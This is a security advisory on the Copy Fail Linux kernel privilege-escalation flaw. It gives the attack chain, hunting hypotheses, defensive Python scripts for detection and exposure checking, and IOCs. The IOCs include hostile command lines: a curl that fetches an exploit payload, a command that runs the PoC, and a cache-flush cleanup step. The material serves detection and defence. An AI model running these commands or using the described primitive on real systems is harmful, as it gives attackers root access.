
Copy Fail Flaw: 5 YARA Rules for Detection

CVE-2026-31431, dubbed Copy Fail, is a critical local privilege escalation vulnerability in the Linux kernel affecting distributions released since 2017. By abusing the AF_ALG socket interface and the authencesn cryptographic template, an attacker can perform a controlled write into the in-memory page cache of setuid binaries, gaining root access without altering on-disk files.

Sensitivity: Immediate | Confidence: high | Analyzed: 2026-05-25

Authors: Maik Morgenstern

Actors: Theori, rootsecdev, blasty

Source: ReversingLabs

IOCs · 25

Detection / Hunter

What Happened

A critical security flaw called 'Copy Fail' has been discovered in the Linux kernel, the core component of most Linux operating systems released since 2017. It lets any standard user on a system instantly gain full administrative (root) control without a password. It is particularly dangerous because it leaves no traces on disk, which makes it invisible to many standard security tools. Organizations running Linux servers, especially in shared or cloud environments, should immediately apply the security patches provided by their operating system vendors.

Key Takeaways

  • CVE-2026-31431 (Copy Fail) is a critical local privilege escalation flaw affecting major Linux distributions since 2017.
  • The vulnerability allows unprivileged users to gain root access by modifying the in-memory page cache of setuid binaries.
  • Exploitation leaves no on-disk traces, bypassing standard file integrity monitoring (FIM) tools.
  • Multiple functional Proof-of-Concept (PoC) exploits are publicly available, including Python scripts and compiled C variants.
  • Detection relies heavily on identifying the 'authencesn(hmac(sha256),cbc(aes))' string combined with AF_ALG socket and splice() usage.

Affected Systems

  • Linux kernel versions 4.14 through 7.0-rc
  • Ubuntu 24.04 LTS
  • Amazon Linux 2023
  • RHEL 14.3
  • SUSE 16

Vulnerabilities (CVEs)

  • CVE-2026-31431

Attack Chain

An unprivileged local attacker runs a Python or C exploit that binds an AF_ALG socket to the authencesn cryptographic template. Using the splice() and sendmsg() system calls, the exploit triggers a 4-byte write into the in-memory page cache of a setuid binary such as /usr/bin/su. The corrupted page injects shellcode that executes setuid(0) and spawns a root shell; because only the cached page is modified, the on-disk file and its hash are unchanged. Some variants then flush the page cache to remove the corruption and prevent other users from triggering the shellcode.

Detection Availability

  • YARA Rules: Yes
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No
  • Platforms: ReversingLabs, Florian Roth, Malware Utkonos

The article provides multiple YARA rules for detecting Python PoC scripts, compiled ELF variants, and specific shellcode patterns associated with the Copy Fail exploit.

Detection Engineering Assessment

EDR Visibility: Low. The exploit writes into the in-memory page cache directly, bypassing the VFS write path. On-disk files are unchanged, so file integrity monitoring (FIM) and static disk scans will not detect the modification; only memory-aware EDR or syscall-level telemetry can.

Network Visibility: None. This is a local privilege escalation that generates no network traffic, unless a dropper script is used to fetch the payload (see the curl command line under Additional IOCs).

Detection Difficulty: Hard. The exploit operates entirely in memory and uses standard system calls (splice, sendmsg) and a legitimate kernel crypto API, so distinguishing it from benign use requires memory inspection or specific behavioral rules, such as an AF_ALG socket bound to the authencesn template in the same session as a setuid binary execution.

Required Log Sources

  • Process Execution Logs (e.g., auditd, Sysmon for Linux)
  • Command Line Logging

Hunting Hypotheses

Hypothesis 1: Hunt for process executions of Python scripts that contain the string 'authencesn(hmac(sha256),cbc(aes))' together with 'os.splice'.
  Telemetry: process command line logs, script block logging, or memory scans.
  ATT&CK stage: Execution. FP risk: Low.

Hypothesis 2: Evaluate whether unprivileged processes unexpectedly execute setuid binaries such as /usr/bin/su, or touch /etc/passwd, immediately followed by a root shell spawn.
  Telemetry: process creation logs (auditd; Sysmon for Linux Event ID 1).
  ATT&CK stage: Privilege Escalation. FP risk: Medium.

Hypothesis 3: Hunt for commands that flush the page cache (e.g., 'echo 3 >/proc/sys/vm/drop_caches') run from interactive shells, which may indicate post-exploitation cleanup.
  Telemetry: command line logs.
  ATT&CK stage: Defense Evasion. FP risk: Medium.

Control Gaps

  • File Integrity Monitoring (FIM) tools relying on on-disk hashes
  • Traditional Antivirus relying on static file signatures

Key Behavioral Indicators

  • Usage of AF_ALG socket bound to authencesn(hmac(sha256),cbc(aes))
  • Calls to splice() targeting setuid binaries
  • Execution of 'echo 3 >/proc/sys/vm/drop_caches' after setuid binary execution (writing to drop_caches requires root, so seeing it from a session whose login uid is unprivileged is the signal, not the command itself)
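The three hunting hypotheses and the behavioral indicators above can be folded into one correlation, written out below as an added example (this is not ReversingLabs' YARA rule set and not code from any PoC). It assumes telemetry has already been normalised into per-event records carrying auditd-style session (ses), login uid (auid), real uid and executable fields; the Event class, the 60-second window and every sample record are constructed for the example.

```python
"""Hunt for Copy Fail (CVE-2026-31431) activity in normalised host telemetry.

Added example for this page, not ReversingLabs' YARA rules and not PoC code.
It implements the hunting hypotheses above: (1) a Python source that pairs the
authencesn template string with os.splice, (2) within one login session of an
unprivileged user, an AF_ALG socket() followed by an exec of a setuid target
and then a root shell, and (3) a drop_caches write after that shell.
The Event shape and all sample records are constructed for the example; map
your own auditd/EDR fields onto them (auditd SYSCALL records carry ses, auid,
uid and exe).
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable

AUTHENCESN = "authencesn(hmac(sha256),cbc(aes))"
AF_ALG = 38                        # address family constant from <linux/socket.h>
SETUID_TARGETS = {"/usr/bin/su"}   # the page's example target; extend per host image
ROOT_SHELLS = {"/bin/sh", "/bin/bash", "/usr/bin/sh", "/usr/bin/bash"}
DROP_CACHES = re.compile(r">\s*/proc/sys/vm/drop_caches")
WINDOW = 60.0                      # seconds between chain steps (assumption; tune)


@dataclass
class Event:
    ts: float      # epoch seconds
    ses: int       # login session id
    auid: int      # login uid: stays 1000 even after the shellcode's setuid(0)
    uid: int       # real uid at the time of the event
    kind: str      # "socket" or "exec"
    detail: str    # socket: address family as decimal string; exec: executable path
    cmdline: str = ""


def script_matches(source: str) -> bool:
    """Hypothesis 1 (low FP): the authencesn template string and os.splice in
    the same Python source. Legitimate AF_ALG users have no reason to splice
    into an AEAD socket, which is exactly the exploit's primitive."""
    return AUTHENCESN in source and re.search(r"\bos\.splice\b", source) is not None


def hunt(events: Iterable[Event]) -> list[dict]:
    """Hypotheses 2 and 3, correlated per login session.

    A plain su followed by a root shell (session 9 below) is NOT flagged: the
    AF_ALG socket created earlier in the same unprivileged session is what
    separates exploitation from ordinary administrator use."""
    by_ses: dict = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        by_ses[ev.ses].append(ev)

    findings = []
    for ses, evs in by_ses.items():
        if evs[0].auid == 0:
            continue                      # root's own session is out of scope
        alg_ts = suid_ts = shell_ts = None
        cleanup = False
        for ev in evs:
            if ev.kind == "socket":
                if ev.detail == str(AF_ALG):
                    alg_ts = ev.ts
                continue
            # exec events from here on; check the cleanup command first so a
            # 'sh -c "echo 3 >/proc/sys/vm/drop_caches"' is not mistaken for
            # a second root shell
            if DROP_CACHES.search(ev.cmdline):
                if shell_ts is not None:
                    cleanup = True
            elif ev.detail in SETUID_TARGETS:
                if alg_ts is not None and ev.ts - alg_ts <= WINDOW:
                    suid_ts = ev.ts
            elif ev.detail in ROOT_SHELLS and ev.uid == 0 and shell_ts is None:
                if suid_ts is not None and ev.ts - suid_ts <= WINDOW:
                    shell_ts = ev.ts
        if shell_ts is not None:
            findings.append({"ses": ses, "auid": evs[0].auid,
                             "root_shell_at": shell_ts, "cleanup_observed": cleanup})
    return findings


# Constructed sample telemetry: session 7 is the exploit chain, session 9 an
# administrator using su normally, session 11 a legitimate AF_ALG user.
SAMPLE_EVENTS = [
    Event(100.0, 7, 1000, 1000, "socket", "38", "python3 copy_fail"),
    Event(100.4, 7, 1000, 1000, "exec", "/usr/bin/su", "su"),
    Event(100.5, 7, 1000, 0, "exec", "/bin/sh", "/bin/sh"),
    Event(103.0, 7, 1000, 0, "exec", "/bin/sh", "sh -c 'echo 3 >/proc/sys/vm/drop_caches'"),
    Event(200.0, 9, 1001, 1001, "exec", "/usr/bin/su", "su -"),
    Event(204.0, 9, 1001, 0, "exec", "/bin/bash", "-bash"),
    Event(300.0, 11, 1002, 1002, "socket", "38", "./kcapi-selftest"),
]

# Constructed source snippets (not working PoCs) for the script-content check.
SAMPLE_SCRIPT = ("import os, socket\n"
                 f"s.bind(('aead', '{AUTHENCESN}'))\n"
                 "os.splice(src, s.fileno(), 4096)\n")
BENIGN_SCRIPT = "s.bind(('hash', 'sha256'))\nos.sendfile(dst, src, 0, 4096)\n"

if __name__ == "__main__":
    print(script_matches(SAMPLE_SCRIPT), script_matches(BENIGN_SCRIPT))
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The socket record is the discriminator, so make sure it is collected: auditd can log it with a syscall rule such as `-a always,exit -F arch=b64 -S socket -F a0=38 -k af_alg` (a0 is the address family; auditd prints arguments in hex, so it appears as a0=26 in the record). Session 11 shows why that record alone is only a hunting lead, not an alert: AF_ALG has legitimate users, which is the Medium FP risk the page assigns to broad rules.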

False Positive Assessment

  • Low for exact PoC matches; Medium for broad hunting rules targeting the 'authencesn' and 'splice' primitive, as this may trigger on legitimate cryptographic testing code.

Recommendations

Immediate Mitigation

  • Verify against your organization's incident response runbook and team escalation paths before acting.
  • Consider applying the latest kernel patches provided by your Linux distribution vendor to address CVE-2026-31431.
  • If patching is not immediately feasible, evaluate whether you can restrict access to the AF_ALG socket interface or the authencesn module, where supported by your environment.
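Restricting the AF_ALG interface in practice means keeping the kernel from loading the module that provides its AEAD socket type, and checking that the restriction actually holds. The script below is an added example, not vendor guidance from the page. It assumes the AEAD flavour of AF_ALG is the algif_aead module and the authencesn template the authencesn module (as in mainline crypto/); the /proc, modules.builtin and modprobe.d text it is fed here is constructed sample input. On a real host feed it the contents of /proc/modules, /lib/modules/$(uname -r)/modules.builtin, /proc/crypto and the concatenated /etc/modprobe.d/*.conf files.

```python
"""Check a host's exposure to the AF_ALG AEAD primitive abused by Copy Fail and
whether an interim modprobe.d mitigation is effective.

Added example, not from the page or a vendor. Assumptions: algif_aead provides
the AF_ALG AEAD socket type and authencesn the template (mainline names); if
algif_aead is built into the kernel, no modprobe setting helps and only the
kernel patch applies. All sample text below is constructed.
"""
import re

ALGIF_AEAD = "algif_aead"


def loaded_modules(proc_modules: str) -> set:
    """First column of /proc/modules is the module name."""
    return {line.split()[0] for line in proc_modules.splitlines() if line.strip()}


def builtin_modules(modules_builtin: str) -> set:
    """modules.builtin lists paths such as kernel/crypto/algif_aead.ko."""
    return {re.sub(r"\.ko(\.\w+)?$", "", line.strip().rsplit("/", 1)[-1])
            for line in modules_builtin.splitlines() if line.strip()}


def authencesn_instantiated(proc_crypto: str) -> bool:
    """An authencesn(...) instance in /proc/crypto means the template has been
    requested since boot, by an exploit or by a legitimate user."""
    return re.search(r"^name\s*:\s*authencesn\(", proc_crypto, re.M) is not None


def modprobe_blocks(modprobe_conf: str, module: str = ALGIF_AEAD) -> dict:
    """Classify modprobe.d directives for `module`.

    A 'blacklist' line only disables the module's internal aliases; the
    kernel's request_module() when an AF_ALG socket is bound still loads it by
    name. 'install <module> /bin/false' replaces the load with a failing
    command and is the directive that actually blocks on-demand loading."""
    weak = strong = False
    for raw in modprobe_conf.splitlines():
        parts = raw.split("#", 1)[0].split()
        if len(parts) < 2 or parts[1].replace("-", "_") != module:
            continue
        if parts[0] == "blacklist":
            weak = True
        elif parts[0] == "install" and parts[2:] in (["/bin/false"], ["/bin/true"]):
            strong = True
    return {"blacklist_only": weak and not strong, "install_blocked": strong}


def exposure(proc_modules: str, modules_builtin: str,
             proc_crypto: str, modprobe_conf: str) -> dict:
    loaded = ALGIF_AEAD in loaded_modules(proc_modules)
    builtin = ALGIF_AEAD in builtin_modules(modules_builtin)
    conf = modprobe_blocks(modprobe_conf)
    return {
        "algif_aead_loaded": loaded,          # an install directive does not unload it; rmmod is needed
        "algif_aead_builtin": builtin,        # modprobe cannot help; patch the kernel
        "authencesn_instantiated": authencesn_instantiated(proc_crypto),
        # Reachable by an unprivileged user unless the module is absent now
        # (not loaded, not built in) and cannot be loaded on demand.
        "af_alg_aead_reachable": loaded or builtin or not conf["install_blocked"],
        "modprobe_blacklist_only": conf["blacklist_only"],
    }


# Constructed samples: the weak setting beside the effective one.
WEAK_CONF = "blacklist algif_aead\n"                      # looks mitigated, is not
STRONG_CONF = ("# Copy Fail (CVE-2026-31431) interim mitigation\n"
               "install algif_aead /bin/false\n"
               "blacklist algif_aead\n")
PROC_MODULES = ("algif_aead 16384 0 - Live 0xffffffffc0a00000\n"
                "authencesn 16384 1 - Live 0xffffffffc09f0000\n")
PROC_CRYPTO = ("name         : authencesn(hmac(sha256),cbc(aes))\n"
               "driver       : authencesn(hmac(sha256-generic),cbc(aes-generic))\n"
               "module       : authencesn\n")

if __name__ == "__main__":
    print(exposure(PROC_MODULES, "", PROC_CRYPTO, WEAK_CONF))
    print(exposure("", "", "", STRONG_CONF))
```

The point of the two configurations is the one practitioners most often get wrong: a blacklist entry alone leaves the module loadable the moment a process binds an AF_ALG AEAD socket, so the host still reports as reachable. Legitimate users of AF_ALG AEAD (rare; most software uses userspace crypto) break under the install directive, so test it on a representative host before rolling it out, and treat it as a stopgap until the kernel update from the distribution is applied.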

Infrastructure Hardening

  • Evaluate whether multi-tenant servers and container clusters can be segmented to reduce the impact of a local privilege escalation.
  • Consider implementing strict least-privilege access controls for local accounts on critical Linux infrastructure.

User Protection

  • If your EDR supports memory scanning, consider deploying the provided YARA rules to scan for in-memory exploit artifacts.

Security Awareness

  • Consider educating development and operations teams about the risks of running untrusted code in shared CI/CD pipelines or container environments.

MITRE ATT&CK Mapping

  • T1068 - Exploitation for Privilege Escalation
  • T1106 - Native API
  • T1059.006 - Command and Scripting Interpreter: Python
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1070 - Indicator Removal

Additional IOCs

  • File Hashes:
    • 3c5ec61632d0699e048d8428461c4d65f89988a370396db2f070f63ebbf9dbae (sha256) - Python PoC variant
    • d401e7d1c00605749d6c617ace73ab20a762b72e41c2e1590331596e38219a61 (sha256) - Python PoC variant
    • e097ce64b1bf0933e69c9d342038fb52f4b278da62b265daa3adf22c00658a9c (sha256) - Python PoC variant
    • 7ef953069578beef7daf2d984d16351b0c60c6adcbf8062ffbfaac6ce944c1da (sha256) - Compiled shellcode ELF payload
    • 01881b737c106a6d84e8e12cb417671b5f612f13adcb6cb1edd8a46704ddd252 (sha256) - Compiled shellcode ELF payload
    • 624d27965a570bc891a87bd62dab28fe401b145e1cbeea6caebcc53a7689bd9d (sha256) - Compiled shellcode ELF payload
    • 8813ad1310ed2e1c1e58cdef0169bef5f38f58b740bd170a370d4baf03dfde99 (sha256) - Compiled shellcode ELF payload
    • fd27a1d93dfc6afb3f705421449c87069595282c91e279660cb06c384d2acaea (sha256) - Compiled shellcode ELF payload
    • 32a2bd2c5f64b05d5db729a42633b792e00e56dd3e4644d21a6e45273b235dbd (sha256) - Compiled shellcode ELF payload
    • 989854c46208c6c1304e2d7038ecabea0cf19f39e6fda3d28576837c22961f21 (sha256) - Compiled shellcode ELF payload
    • 44900c631391f0d60eb6d271b8374a08dc1d9be76e403390d27a91ed5f179be9 (sha256) - Compiled shellcode ELF payload
    • 30b0f5b5a054c4df65b48ca792863bf7054b4d793f15f57163792ba6c2b151ae (sha256) - Compiled shellcode ELF payload
    • d86251e90db613329d4be9cf0355caa69ae88f7416be82a6880b8f9f7b7e691b (sha256) - Compiled shellcode ELF payload
    • f6dda491e85981feb1c0900f2b16f556e7aa2ca79b569b1180549cae58c22f98 (sha256) - Compiled shellcode ELF payload
    • 1ce3dc778637cd78e20f115fe1e47debf16d6af538daf95dff14243111779e28 (sha256) - Compiled shellcode ELF payload
    • 60b1645b1f3ad7f6391243d58a2a31f974e1599364564a69594b96ba21abe375 (sha256) - Compiled shellcode ELF payload
    • c6dd71f1f41c5d6fca0d3261a5ae9e49d01d6755c62d487e9a0cd7de933d6f64 (sha256) - Compiled shellcode ELF payload
    • b35ddf2ecd035faf9b38af62779502b7fa19037115054a00ed8d5327a3f2ec03 (sha256) - blasty goodcopy.c source code
  • Command Lines:
    • Purpose: Flush page cache after execution to clean up memory corruption | Tools: echo | Stage: Defense Evasion | echo 3 >/proc/sys/vm/drop_caches
    • Purpose: Download exploit payload via dropper script | Tools: curl | Stage: Delivery | curl https://copy.fail/exp
    • Purpose: Execute Python PoC exploit | Tools: python3 | Stage: Execution | python3 copy_fail